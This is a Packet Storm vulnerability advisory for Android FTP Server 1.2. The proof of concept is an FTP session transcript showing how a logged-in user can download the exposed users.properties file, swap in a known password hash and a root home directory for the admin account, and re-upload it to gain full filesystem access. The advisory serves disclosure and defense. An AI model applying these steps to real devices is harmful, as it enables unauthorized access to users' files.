exploit the possibilities

Android FTP Server 1.2 Privilege Escalation

Android FTP Server 1.2 Privilege Escalation
Posted Sep 9, 2013
Authored by Larry W. Cashdollar

Android FTP Serve version 1.2 exposes the configuration file with full read and write permissions. A malicious party can overwrite the credentials for the administrator and escalate privileges.

tags | exploit
MD5 | c59f87bb2a7d3a30d4077bbd4f8c474c

Android FTP Server 1.2 Privilege Escalation

Change Mirror Download
Remote access to Android ftp server 1.2 configuration file allows login as admin 
Date: 9/7/2013
Author: Larry W. Cashdollar, @_larry0 
Download: http://www.amazon.com/888bid-com-Android-FTP-Server/dp/B00COVVAZM/ref=sr_1_1?s=mobile-apps
Description: "Transfer files between Android devices and computers without a USB cable and Windows software driver. Transfer files to and from your Android device over the Internet. Use Windows Explorer to transfer files between your Android device and your computer by drag and drop. You can add additional users with read only permission for download, and read and write permission for both upload and download."
Vulnerability: ftp server exposes configuration file and allows read/write. Allowing a remote user to overwrite the credentials for admin login giving full access to the file system on the device.
PoC
Edit the users.properties file and re-upload.
Connected to 192.168.0.29.
220 Service ready for new user.
Name (192.168.0.29:larry): android
331 User name okay, need password for android.
Password:
230 User logged in, proceed.
Remote system type is UNIX.
ftp> cd ftpConfig
250 Directory changed to /ftpConfig
ftp> ls
229 Entering Passive Mode (|||49825|)
150 File status okay; about to open data connection.
-rw------- 1 user group 679 Sep 7 16:37 users.properties
226 Closing data connection.
ftp> get users.properties
local: users.properties remote: users.properties
229 Entering Passive Mode (|||59616|)
150 File status okay; about to open data connection.
100% |********************************************| 695 9.60 MiB/s --:-- ETA
226 Transfer complete.
695 bytes received in 00:00 (121.85 KiB/s)
ftp>
If we take a look at the users.properties file:
#Generated file - don't edit (please)
#Sat Sep 07 16:13:44 EDT 2013
ftpserver.user.android.enableflag=true
ftpserver.user.admin.maxloginnumber=0
ftpserver.user.android.writepermission=true
ftpserver.user.android.idletime=0
ftpserver.user.admin.homedirectory=/mnt/sdcard <-change to /
ftpserver.user.admin.writepermission=true
ftpserver.user.admin.maxloginperip=0
ftpserver.user.android.homedirectory=/sdcard
ftpserver.user.admin.userpassword=21232F297A57A5A743894A0E4A801FC3 <- replace with 23594328\:070A6394BF17CD0A401F12ACC021714F 'android' password [1]
ftpserver.user.admin.downloadrate=0
ftpserver.user.admin.enableflag=true
ftpserver.user.admin.idletime=0
ftpserver.user.admin.uploadrate=0
ftpserver.user.android.userpassword=23594328\:070A6394BF17CD0A401F12ACC021714F
upload file as android/android user to ftpConfig/users.properties The next time the ftp server is started (on/off button in app interface) you can login as admin.
login as admin/android
ftp> user admin
331 User name okay, need password for admin. Password: 
230 User logged in, proceed.
Remote system type is UNIX.
ftp> dir
229 Entering Passive Mode (|||52585|)
150 File status okay; about to open data connection.
dr-x------ 3 user group 0 Jul 11 20:09 acct
d--x------ 3 user group 0 Aug 17 09:09 cache
d--x------ 3 user group 0 Jul 11 20:09 config
dr-x------ 3 user group 0 Dec 31 1969 d
d--x------ 3 user group 0 Sep 16 2012 data
dr-x------ 3 user group 0 Jul 11 20:15 dev
d--x------ 3 user group 0 Sep 2 14:07 dropbox
dr-x------ 3 user group 0 Mar 29 13:48 etc
dr-x------ 3 user group 0 Jul 11 20:09 mnt
dr-x------ 3 user group 0 Dec 31 1969 proc
d--x------ 3 user group 0 Feb 26 2013 root
d--x------ 3 user group 0 Dec 31 1969 sbin
drwx------ 3 user group 0 Sep 7 15:09 sdcard
dr-x------ 3 user group 0 Jul 11 20:09 sys
dr-x------ 3 user group 0 Mar 29 13:49 system
dr-x------ 3 user group 0 Mar 29 13:49 vendor
-r-------- 1 user group 118 Dec 31 1969 default.prop
---------- 1 user group 94200 Dec 31 1969 init
---------- 1 user group 1677 Dec 31 1969 init.goldfish.rc
---------- 1 user group 11658 Dec 31 1969 init.omap4430.rc
---------- 1 user group 14869 Dec 31 1969 init.rc
-r-------- 1 user group 0 Dec 31 1969 ueventd.goldfish.rc
-r-------- 1 user group 840 Dec 31 1969 ueventd.omap4430.rc
-r-------- 1 user group 4203 Dec 31 1969 ueventd.rc
226 Closing data connection.
ftp>

Tested on kindle fire & droid bionic. 
[1] MD5 of admin, http://www.md5-hash.com/md5-hashing-decrypt/21232f297a57a5a743894a0e4a801fc3 but didn't allow me to login when I used admin/admin. Vendor: Not notified.

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    14 Files
  • 20
    Sep 20th
    20 Files
  • 21
    Sep 21st
    3 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close